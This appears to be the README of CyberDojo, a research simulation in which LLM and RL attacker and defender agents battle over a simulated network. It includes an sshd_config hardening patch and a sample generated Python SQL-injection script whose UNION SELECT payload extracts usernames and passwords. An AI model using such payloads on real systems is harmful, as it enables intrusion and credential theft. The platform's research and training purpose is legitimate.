🥋 CyberDojo

Adversarial AI War Games — Where LLMs Battle for Network Supremacy

A co-evolutionary LLM-augmented adversarial simulation platform for autonomous cyber attack and defense with multi-agent APT swarms.

Features · Quick Start · Architecture · Game Modes · Research Paper

🧠 What is CyberDojo?

CyberDojo is a first-of-its-kind cybersecurity simulation platform where AI-powered Red Team (attackers) and Blue Team (defenders) battle autonomously over a simulated network — and you can take command of either side.

Unlike traditional cyber ranges that use scripted scenarios, CyberDojo combines:

🤖 Reinforcement Learning (PPO/DQN) for agents that learn optimal strategies
🧠 Large Language Models (GPT-4o) for agents that reason in natural language
👤 Human-in-the-Loop for you to command either team through a live dashboard
🐝 Multi-Agent APT Swarms where 3 specialized LLM hackers coordinate attacks
⚡ LLM Code Generation that writes real Python exploits and config patches during battle

The result? Agents that don't just choose abstract "attack" or "defend" — they write actual exploit scripts, generate configuration patches, communicate in a hacker chatroom, and produce interpretable reasoning for every decision.

✨ Features

🔴 Red Team (Attack)

Feature	Description
12 Attack Actions	scan_network, scan_vulnerability, exploit, privilege_escalate, lateral_move, install_backdoor, exfiltrate_data, cover_tracks, deploy_ransomware, phish_user, ddos_service, wait
LLM Exploit Generator	GPT-4o writes full Python exploit scripts (SQL injection, buffer overflow, SSH bypass, DNS poisoning) targeting specific CVEs on specific nodes
APT Swarm Mode	3 coordinated LLM agents — Scout 🔍, Breacher 💥, Exfiltrator 📤 — communicate via a shared Hacker Chatroom
Red Commander	Play as the hacker yourself with point-and-click attack controls
MITRE ATT&CK	Every action maps to real-world ATT&CK techniques (T1046, T1190, T1041, etc.)
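As a rough illustration of the ATT&CK mapping, the sketch below pairs a few Red actions with technique IDs. Only T1046, T1190, and T1041 are named in this README. Which action each one belongs to, the two extra entries, and the names `ATTACK_TECHNIQUES` and `technique_for` are assumptions made for this example, not the contents of `mitre.py`.

```python
# Hypothetical action-to-technique table. The pairing of actions to IDs is
# assumed for illustration; it is not taken from the project's mitre.py.
ATTACK_TECHNIQUES = {
    "scan_network": ("T1046", "Network Service Discovery"),
    "exploit": ("T1190", "Exploit Public-Facing Application"),
    "exfiltrate_data": ("T1041", "Exfiltration Over C2 Channel"),
    "phish_user": ("T1566", "Phishing"),
    "deploy_ransomware": ("T1486", "Data Encrypted for Impact"),
}


def technique_for(action: str) -> str:
    """Return 'ID (name)' for a mapped action, or 'unmapped' otherwise."""
    entry = ATTACK_TECHNIQUES.get(action)
    if entry is None:
        return "unmapped"
    technique_id, name = entry
    return f"{technique_id} ({name})"
```

A lookup table like this keeps the mapping auditable in one place, and actions without a technique (such as `wait`) simply fall through to `unmapped`.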

🔵 Blue Team (Defense)

Feature	Description
12 Defense Actions	monitor_traffic, analyze_alert, patch_vulnerability, isolate_node, restore_backup, update_firewall, deploy_honeypot, forensic_analysis, deploy_ids_rule, segment_network, rotate_credentials, wait
Auto-Remediation	LLM generates actual config patches (nginx.conf, sshd_config, smb.conf) for detected vulnerabilities
Pen Test Preview	Preview which exploits Red could deploy against any node before it attacks
Blue Commander	Command the defense team against AI-driven attackers

🌐 Platform

Feature	Description
Infinite Scenarios	Type "Hospital Network" or "Military Base" → LLM generates a complete network topology with realistic nodes, services, subnets, and CVEs
Real-Time Dashboard	D3.js network graph, live team stats, battle log, commander chat, hacker chatroom
Co-Evolutionary Training	Red and Blue agents evolve together and are ranked with an ELO rating system
Sim-to-Real Export	Export defensive playbooks as executable Bash scripts
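One way the Sim-to-Real export could work is to render a list of recorded Blue actions into a Bash script. The sketch below is an assumption about the shape of that step, not the behavior of `sim2real.py`: the command templates, the `export_playbook` name, and the step dictionary layout are all hypothetical, and it uses plain string formatting rather than the Jinja2 listed in the tech stack.

```python
import shlex

# Hypothetical command templates; the real export format is not documented here.
COMMAND_TEMPLATES = {
    "isolate_node": "iptables -A INPUT -s {target} -j DROP",
    "update_firewall": "iptables -A INPUT -p tcp --dport {port} -j DROP",
}


def export_playbook(actions):
    """Render a list of {'action': ..., <params>} dicts as a Bash script string."""
    lines = ["#!/usr/bin/env bash", "set -euo pipefail", ""]
    for step in actions:
        template = COMMAND_TEMPLATES.get(step["action"])
        if template is None:
            # Leave a marker instead of guessing a command for unknown actions.
            lines.append(f"# TODO: no template for {step['action']}")
            continue
        # Quote every parameter so values cannot inject extra shell syntax.
        params = {k: shlex.quote(str(v)) for k, v in step.items() if k != "action"}
        lines.append(template.format(**params))
    return "\n".join(lines) + "\n"
```

Quoting each parameter with `shlex.quote` matters here because node names and addresses may originate from LLM-generated scenarios.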

🚀 Quick Start

Prerequisites

Python 3.10+
OpenAI API key (for LLM features)

Installation

# Clone the repository
git clone https://github.com/satyamdas03/CyberDojo.git
cd CyberDojo

# Install dependencies
pip install -r requirements.txt

# Set your OpenAI API key
$env:OPENAI_API_KEY = "your-api-key-here"    # PowerShell
# export OPENAI_API_KEY="your-api-key-here"  # Linux/Mac

Run Your First Battle

# 🤖 AI vs AI — Watch LLM agents battle each other
python main.py battle --red llm --blue llm --scenario "Hospital Network" --visualize

# 🎮 Play as the Hacker — You attack, AI defends
python main.py battle --red commander --blue llm --scenario "Corporate Network" --visualize

# 🛡️ Play as the Defender — AI attacks, you defend
python main.py battle --red llm --blue commander --scenario "Military Base" --visualize

# 🐝 APT Swarm vs You — 3 coordinated hackers attack your network
python main.py battle --red swarm --blue commander --scenario "Bank" --visualize

# 🏋️ Train RL agents through co-evolution
python main.py train --red-algo ppo --blue-algo ppo --timesteps 100000

🏗️ Architecture

CyberDojo/
├── main.py                    # CLI entry point (train, battle, demo, benchmark)
├── requirements.txt           # Python dependencies
├── cyberdojo/                 # Core simulation engine
│   ├── __init__.py
│   ├── environment.py         # OpenAI Gym environment (CyberDojoEnv)
│   ├── network.py             # Network topology & node management
│   ├── agents.py              # RL agents (PPO, DQN, Scripted, Random)
│   ├── llm_agents.py          # LLM agents (Red, Blue, Commander, Red Commander)
│   ├── apt_swarm.py           # Multi-Agent APT Swarm (Scout, Breacher, Exfiltrator)
│   ├── exploit_gen.py         # LLM exploit code generation engine
│   ├── remediation.py         # Auto-remediation config patch generator
│   ├── llm_scenario.py        # Infinite LLM scenario generator
│   ├── rewards.py             # Reward shaping for RL training
│   ├── trainer.py             # Co-evolutionary training loop with ELO
│   ├── mitre.py               # MITRE ATT&CK technique mapping
│   ├── sim2real.py            # Sim-to-Real playbook export
│   └── config.py              # Configuration management
├── dashboard/                 # Real-time web dashboard
│   ├── server.py              # Flask-SocketIO backend
│   ├── index.html             # Dashboard UI
│   ├── dashboard.js           # D3.js network visualization + WebSocket logic
│   └── styles.css             # Cyberpunk-themed styling
└── tests/                     # Test suite
    └── test_*.py

System Diagram

┌─────────────────────────────────────────────────────────────────┐
│                        CYBERDOJO ENGINE                          │
│  ┌──────────────────────────────────────────────────────────┐   │
│  │              CyberDojoEnv (OpenAI Gym)                    │   │
│  │  ┌─────────────┐  ┌──────────────┐  ┌───────────────┐   │   │
│  │  │ Network     │  │ State Machine│  │ Reward Engine │   │   │
│  │  │ Topology    │  │ 12 Red acts  │  │ Red & Blue    │   │   │
│  │  │ Nodes/Edges │  │ 12 Blue acts │  │ reward shaping│   │   │
│  │  └─────────────┘  └──────────────┘  └───────────────┘   │   │
│  └──────────────────────────────────────────────────────────┘   │
│                                                                  │
│  ┌─── RED TEAM ──────────────┐  ┌─── BLUE TEAM ─────────────┐  │
│  │ • RL Agent (PPO/DQN)      │  │ • RL Agent (PPO/DQN)      │  │
│  │ • LLM Agent (GPT-4o)     │  │ • LLM Agent (GPT-4o)      │  │
│  │ • Red Commander (Human)   │  │ • Blue Commander (Human)   │  │
│  │ • APT Swarm (3× LLM)     │  │ • Auto-Remediation Engine │  │
│  │ • Exploit Code Generator  │  │ • Pen Test Preview         │  │
│  └───────────────────────────┘  └────────────────────────────┘  │
│                                                                  │
│  ┌─── DASHBOARD (Flask + D3.js + WebSocket) ─────────────────┐  │
│  │ Network Graph │ Team Stats │ Battle Log │ Commander Chat   │  │
│  │ Hacker Chatroom │ Action Menu │ Exploit Code Display      │  │
│  └───────────────────────────────────────────────────────────┘  │
└─────────────────────────────────────────────────────────────────┘
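To make the engine box in the diagram more concrete, here is a toy two-player environment with a Gym-like `reset`/`step` interface. It is a deliberately simplified stand-in: `ToyCyberEnv`, its three-action subsets, and its reward values are hypothetical and do not reflect the real `CyberDojoEnv`, its 12-action spaces, or its reward shaping.

```python
import random

# Small subsets of the 12 Red and 12 Blue actions, for illustration only.
RED_ACTIONS = ["scan_network", "exploit", "wait"]
BLUE_ACTIONS = ["monitor_traffic", "patch_vulnerability", "wait"]


class ToyCyberEnv:
    """Hypothetical stand-in for CyberDojoEnv with a Gym-like reset/step API."""

    def __init__(self, num_nodes=4, max_steps=20, seed=0):
        self.num_nodes = num_nodes
        self.max_steps = max_steps
        self.rng = random.Random(seed)
        self.reset()

    def reset(self):
        self.steps = 0
        self.vulnerable = set(range(self.num_nodes))
        self.compromised = set()
        return self._observe()

    def _observe(self):
        return {
            "vulnerable": sorted(self.vulnerable),
            "compromised": sorted(self.compromised),
        }

    def step(self, red_action, blue_action):
        """Apply one Blue action, then one Red action, and return the result."""
        self.steps += 1
        red_reward = blue_reward = 0.0
        # Blue moves first: patching removes the lowest-numbered vulnerable node.
        if blue_action == "patch_vulnerability" and self.vulnerable:
            self.vulnerable.discard(min(self.vulnerable))
            blue_reward += 1.0
        # Red can only exploit nodes that are still vulnerable and not yet owned.
        if red_action == "exploit":
            targets = self.vulnerable - self.compromised
            if targets:
                self.compromised.add(self.rng.choice(sorted(targets)))
                red_reward += 1.0
                blue_reward -= 1.0
        done = (
            self.steps >= self.max_steps
            or len(self.compromised) == self.num_nodes
        )
        return self._observe(), (red_reward, blue_reward), done
```

Any agent type from the diagram (RL, LLM, human commander) would then only need to map an observation to one of the action names.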

🎮 Game Modes

1. 🤖 AI vs AI (`--red llm --blue llm`)

Watch two GPT-4o agents battle it out. The Red LLM reasons step-by-step about attack strategy while the Blue LLM analyzes threats and deploys defenses.

2. 🎮 Red Commander (`--red commander`)

Play as the hacker. Click on nodes to select targets, then choose from 8 attack buttons (Scan, Exploit, Backdoor, Phish, etc.). The LLM translates your orders into precise game actions.
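Because the LLM sits between the commander's order and the game engine, its output presumably has to be validated before it is executed. The sketch below assumes the LLM replies with a JSON object containing `action` and `target` keys. That reply format, and the `RedOrder` and `parse_order` names, are hypothetical; the project lists Pydantic v2 for structured output, whereas this example sticks to the standard library.

```python
import json
from dataclasses import dataclass
from typing import Optional

# The 12 Red actions listed in the Features section.
RED_ACTIONS = {
    "scan_network", "scan_vulnerability", "exploit", "privilege_escalate",
    "lateral_move", "install_backdoor", "exfiltrate_data", "cover_tracks",
    "deploy_ransomware", "phish_user", "ddos_service", "wait",
}


@dataclass(frozen=True)
class RedOrder:
    action: str
    target: Optional[str]


def parse_order(raw: str) -> RedOrder:
    """Validate an assumed JSON reply and turn it into a RedOrder."""
    data = json.loads(raw)  # raises ValueError on malformed JSON
    if not isinstance(data, dict):
        raise ValueError("expected a JSON object")
    action = data.get("action")
    if action not in RED_ACTIONS:
        raise ValueError(f"unknown Red action: {action!r}")
    target = data.get("target")
    # Every action except 'wait' is assumed to need a target node.
    if action != "wait" and not target:
        raise ValueError(f"action {action!r} requires a target")
    return RedOrder(action=action, target=target)
```

Rejecting unknown actions at this boundary keeps a hallucinated action name from reaching the simulation.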

3. 🛡️ Blue Commander (`--blue commander`)

Play as the SOC analyst. Defend your network against AI-driven attacks. Monitor alerts, isolate compromised nodes, deploy patches, and use the Pen Test button to preview potential exploits.

4. 🐝 APT Swarm (`--red swarm`)

Three coordinated LLM attackers assault your network:

Scout 🔍 — Maps the network and finds vulnerabilities
Breacher 💥 — Exploits the targets Scout identifies
Exfiltrator 📤 — Steals data from nodes Breacher compromises

They coordinate through a Hacker Chatroom visible as an "Intercepted Communications" panel on the dashboard.
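The Scout, Breacher, and Exfiltrator hand-off can be pictured as three roles reading from and posting to one shared message log. In the sketch below, simple rules stand in for the LLM calls, and `Chatroom`, the message fields, and the three role functions are hypothetical names chosen for illustration rather than the API of `apt_swarm.py`.

```python
from dataclasses import dataclass, field


@dataclass
class Chatroom:
    """Shared message log that all three swarm roles read and write."""
    messages: list = field(default_factory=list)

    def post(self, sender: str, kind: str, node: str) -> None:
        self.messages.append({"sender": sender, "kind": kind, "node": node})

    def nodes_of(self, kind: str) -> list:
        return [m["node"] for m in self.messages if m["kind"] == kind]


def scout(room: Chatroom, network: dict) -> None:
    # Report every node that has at least one known vulnerability.
    for node, vulns in network.items():
        if vulns:
            room.post("Scout", "vulnerable", node)


def breacher(room: Chatroom) -> None:
    # Act only on targets the Scout has already announced.
    for node in room.nodes_of("vulnerable"):
        room.post("Breacher", "compromised", node)


def exfiltrator(room: Chatroom) -> None:
    # Act only on nodes the Breacher has already compromised.
    for node in room.nodes_of("compromised"):
        room.post("Exfiltrator", "exfiltrated", node)


def run_swarm_round(network: dict) -> Chatroom:
    room = Chatroom()
    scout(room, network)
    breacher(room)
    exfiltrator(room)
    return room
```

Since every role communicates only through the log, the same message list could be streamed to a dashboard panel without extra bookkeeping.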

5. 🏋️ RL Training (`train`)

Train Red and Blue RL agents through co-evolutionary self-play. Agents compete in rounds, earn ELO ratings, and the weakest are pruned while the strongest are cloned.
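The rating and selection step can be sketched with the standard Elo update followed by a prune-and-clone pass. The K-factor of 32, the 400-point scale, the population layout, and the function names are conventional defaults or assumptions made for this example; the README does not state the values used in `trainer.py`.

```python
def expected_score(rating_a: float, rating_b: float) -> float:
    """Standard Elo expected score of A against B."""
    return 1.0 / (1.0 + 10 ** ((rating_b - rating_a) / 400.0))


def update_elo(rating_a: float, rating_b: float, score_a: float, k: float = 32.0):
    """Return updated (A, B) ratings; score_a is 1 for a win, 0.5 draw, 0 loss."""
    expected_a = expected_score(rating_a, rating_b)
    new_a = rating_a + k * (score_a - expected_a)
    new_b = rating_b + k * ((1.0 - score_a) - (1.0 - expected_a))
    return new_a, new_b


def prune_and_clone(ratings: dict, n: int = 1) -> dict:
    """Drop the n lowest-rated agents and clone the n highest-rated ones."""
    if not 0 < n <= len(ratings) // 2:
        raise ValueError("n must be between 1 and half the population size")
    ranked = sorted(ratings, key=ratings.get, reverse=True)
    next_gen = {name: ratings[name] for name in ranked[:-n]}
    for name in ranked[:n]:
        # A clone starts with its parent's rating.
        next_gen[f"{name}-clone"] = ratings[name]
    return next_gen
```

For two agents rated 1500, a win moves the winner to 1516 and the loser to 1484, so the total rating in the population is preserved.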

💀 LLM Exploit Generator

When the Red Team executes an exploit action, the LLM generates a full Python exploit script in real time:

#!/usr/bin/env python3
# CVE-2024-2187 — SQL Injection on email-gateway (10.0.1.11)

import requests

def exploit_sql_injection(target_url):
    payload = "' UNION SELECT null, user, password FROM users -- "
    vulnerable_url = f"{target_url}/search?query={payload}"
    
    response = requests.get(vulnerable_url, timeout=10)
    if response.status_code == 200:
        print(f"[+] Data extracted: {response.text[:200]}")
        return True
    return False

if __name__ == "__main__":
    exploit_sql_injection("http://10.0.1.11")

Supported exploit types: SQL Injection, Buffer Overflow, SSH Auth Bypass, Remote Code Execution, LDAP Injection, DNS Cache Poisoning, SMB RCE, Privilege Escalation, Phishing payloads.

🔧 Auto-Remediation Engine

When the Blue Team selects patch_vulnerability, the LLM generates actual configuration patches:

# sshd_config — Fixing CVE-2024-4321 (SSH Buffer Overflow)
- Protocol 1,2
+ Protocol 2
- Ciphers aes128-cbc,3des-cbc,aes256-cbc
+ Ciphers aes256-gcm@openssh.com,chacha20-poly1305@openssh.com
- MaxAuthTries 10
+ MaxAuthTries 3
+ LoginGraceTime 30

Supported configs: nginx.conf, sshd_config, smb.conf, apache2.conf, mysql.cnf, postgresql.conf, firewall rules, kubernetes manifests, docker-compose.yml.
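A patch in the style shown above can be rendered from a before/after pair with Python's `difflib`. This sketch covers only the rendering step: in CyberDojo the hardened config would come from the LLM, and `render_patch` is a hypothetical helper name, not part of `remediation.py`.

```python
import difflib


def render_patch(filename: str, before: str, after: str) -> str:
    """Return a unified diff between two versions of a config file."""
    diff = difflib.unified_diff(
        before.splitlines(),
        after.splitlines(),
        fromfile=f"a/{filename}",
        tofile=f"b/{filename}",
        lineterm="",  # inputs have no trailing newlines, so emit none
    )
    return "\n".join(diff)


if __name__ == "__main__":
    original = "Protocol 1,2\nMaxAuthTries 10\n"
    hardened = "Protocol 2\nMaxAuthTries 3\nLoginGraceTime 30\n"
    print(render_patch("sshd_config", original, hardened))
```

Emitting a unified diff rather than a whole file makes the proposed change easy to review before it is applied.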

📊 Performance

Red Agent	Nodes Compromised	Data Stolen	Exploit Scripts Generated
Random	0.8	1.2	0
Scripted	1.5	3.8	0
RL (PPO)	2.8	8.5	0
LLM (GPT-4o)	2.5	7.2	~5 per battle
APT Swarm	3.2	12.0	~8 per battle

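The APT Swarm achieves the highest data exfiltration (12.0, versus 8.5 for the next-best agent, RL (PPO)), which is attributed to its coordinated Scout→Breacher→Exfiltrator pipeline. RL agents achieve better stealth (fewer detections), although detection counts are not listed in the table.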

📚 Research Paper

This project accompanies a research paper:

"CyberDojo: A Co-Evolutionary LLM-Augmented Adversarial Simulation Platform for Autonomous Cyber Attack and Defense with Multi-Agent APT Swarms"

Satyam Das and S.P. Raja

Novel Contributions

LLM Agents That Write Real Code — First cybersecurity simulation where agents generate executable exploit scripts and configuration patches during gameplay
Multi-Agent APT Swarm with Natural Language Coordination — Three specialized LLM agents coordinate through a shared chatroom, mimicking real-world APT group behavior
Hybrid RL+LLM Architecture — First platform combining trained RL policies with LLM reasoning in cybersecurity
Dual Human-in-the-Loop — Seamlessly play as either the attacker or defender with full AI opposition
Infinite LLM Scenario Generation — Generate complete network topologies from text descriptions

Competitive Landscape

Capability	CyberBattleSim	CALDERA	PentestGPT	CyberDojo
RL Agents	✅	❌	❌	✅
LLM Agents	❌	❌	✅	✅
Multi-Agent APT	❌	Partial	❌	✅
Exploit Code Gen	❌	❌	❌	✅
Auto-Remediation	❌	❌	❌	✅
Human-in-the-Loop	❌	❌	Chat	✅
Infinite Scenarios	❌	❌	❌	✅
Live Dashboard	❌	Web UI	❌	✅

🖥️ CLI Reference

# ─── Battle Mode ───
python main.py battle [OPTIONS]
  --red      {rl,scripted,random,llm,commander,swarm}   Red Team agent
  --blue     {rl,scripted,random,llm,commander}          Blue Team agent
  --scenario "Theme Name"     LLM-generated scenario
  --network-size {small,medium,large}
  --visualize                 Open the live dashboard
  --sim2real                  Export defensive playbook

# ─── Training Mode ───
python main.py train [OPTIONS]
  --red-algo  {ppo,dqn}      RL algorithm for Red
  --blue-algo {ppo,dqn}      RL algorithm for Blue
  --timesteps 100000         Training steps
  --co-evolve                Enable co-evolutionary training

# ─── Other ───
python main.py demo          Quick demo with visualizations
python main.py benchmark     Run performance benchmarks
python main.py dashboard     Launch dashboard only
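For readers who want to script against this interface, the reference above can be mirrored with `argparse` subcommands. This is a sketch reconstructed from the documented flags, not the actual contents of `main.py`; the default values and the `build_parser` name are assumptions.

```python
import argparse


def build_parser() -> argparse.ArgumentParser:
    parser = argparse.ArgumentParser(prog="main.py")
    sub = parser.add_subparsers(dest="command", required=True)

    # battle: choose an agent type for each team and optional scenario settings
    battle = sub.add_parser("battle")
    battle.add_argument(
        "--red", default="llm",
        choices=["rl", "scripted", "random", "llm", "commander", "swarm"],
    )
    battle.add_argument(
        "--blue", default="llm",
        choices=["rl", "scripted", "random", "llm", "commander"],
    )
    battle.add_argument("--scenario", default=None)
    battle.add_argument(
        "--network-size", default="medium", choices=["small", "medium", "large"],
    )
    battle.add_argument("--visualize", action="store_true")
    battle.add_argument("--sim2real", action="store_true")

    # train: pick an RL algorithm per team and a training budget
    train = sub.add_parser("train")
    train.add_argument("--red-algo", default="ppo", choices=["ppo", "dqn"])
    train.add_argument("--blue-algo", default="ppo", choices=["ppo", "dqn"])
    train.add_argument("--timesteps", type=int, default=100000)
    train.add_argument("--co-evolve", action="store_true")

    # Subcommands without options
    for name in ("demo", "benchmark", "dashboard"):
        sub.add_parser(name)
    return parser
```

Using `choices` means an unsupported combination such as `--blue swarm` is rejected at parse time with a usage message.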

🛠️ Tech Stack

Component	Technology
Core Engine	Python, NumPy, OpenAI Gym
RL Training	PyTorch, Stable-Baselines3
LLM Integration	LangChain, OpenAI GPT-4o
Structured Output	Pydantic v2
Dashboard	Flask, Flask-SocketIO, D3.js
Network Graph	NetworkX
Export	Bash, Jinja2

⚠️ Ethical Disclaimer

CyberDojo is designed exclusively for educational and research purposes. All exploit code is generated against simulated, fictional network infrastructure within a sandboxed environment. The platform includes safety measures:

Exploits target only simulated IP addresses
No real network connections are made
The auto-remediation engine focuses on defensive applications
Commander mode is designed for training security professionals
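The first safety measure above could be enforced with an allowlist check before any generated script is shown or stored. The sketch below is one possible guard, not the project's implementation: the `10.0.0.0/16` range is an assumption based on the `10.0.1.11` address used in the exploit example, and `SIMULATED_SUBNETS` and `is_simulated_target` are hypothetical names.

```python
import ipaddress

# Hypothetical allowlist of subnets that exist only inside the simulation.
SIMULATED_SUBNETS = [ipaddress.ip_network("10.0.0.0/16")]


def is_simulated_target(address: str) -> bool:
    """Return True only if the address parses and falls in a simulated subnet."""
    try:
        ip = ipaddress.ip_address(address)
    except ValueError:
        # Hostnames and malformed input are rejected rather than resolved.
        return False
    return any(ip in subnet for subnet in SIMULATED_SUBNETS)
```

Rejecting anything that does not parse as an IP address avoids a DNS lookup, which would itself be a real network connection.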

Do not use generated exploit code against real systems without explicit authorization.

📄 License

MIT License — see LICENSE for details.

👤 Author

Satyam Das

GitHub: @satyamdas03

Built with 🧠 AI and ☕ caffeine

If you find this project useful, please ⭐ star the repo!
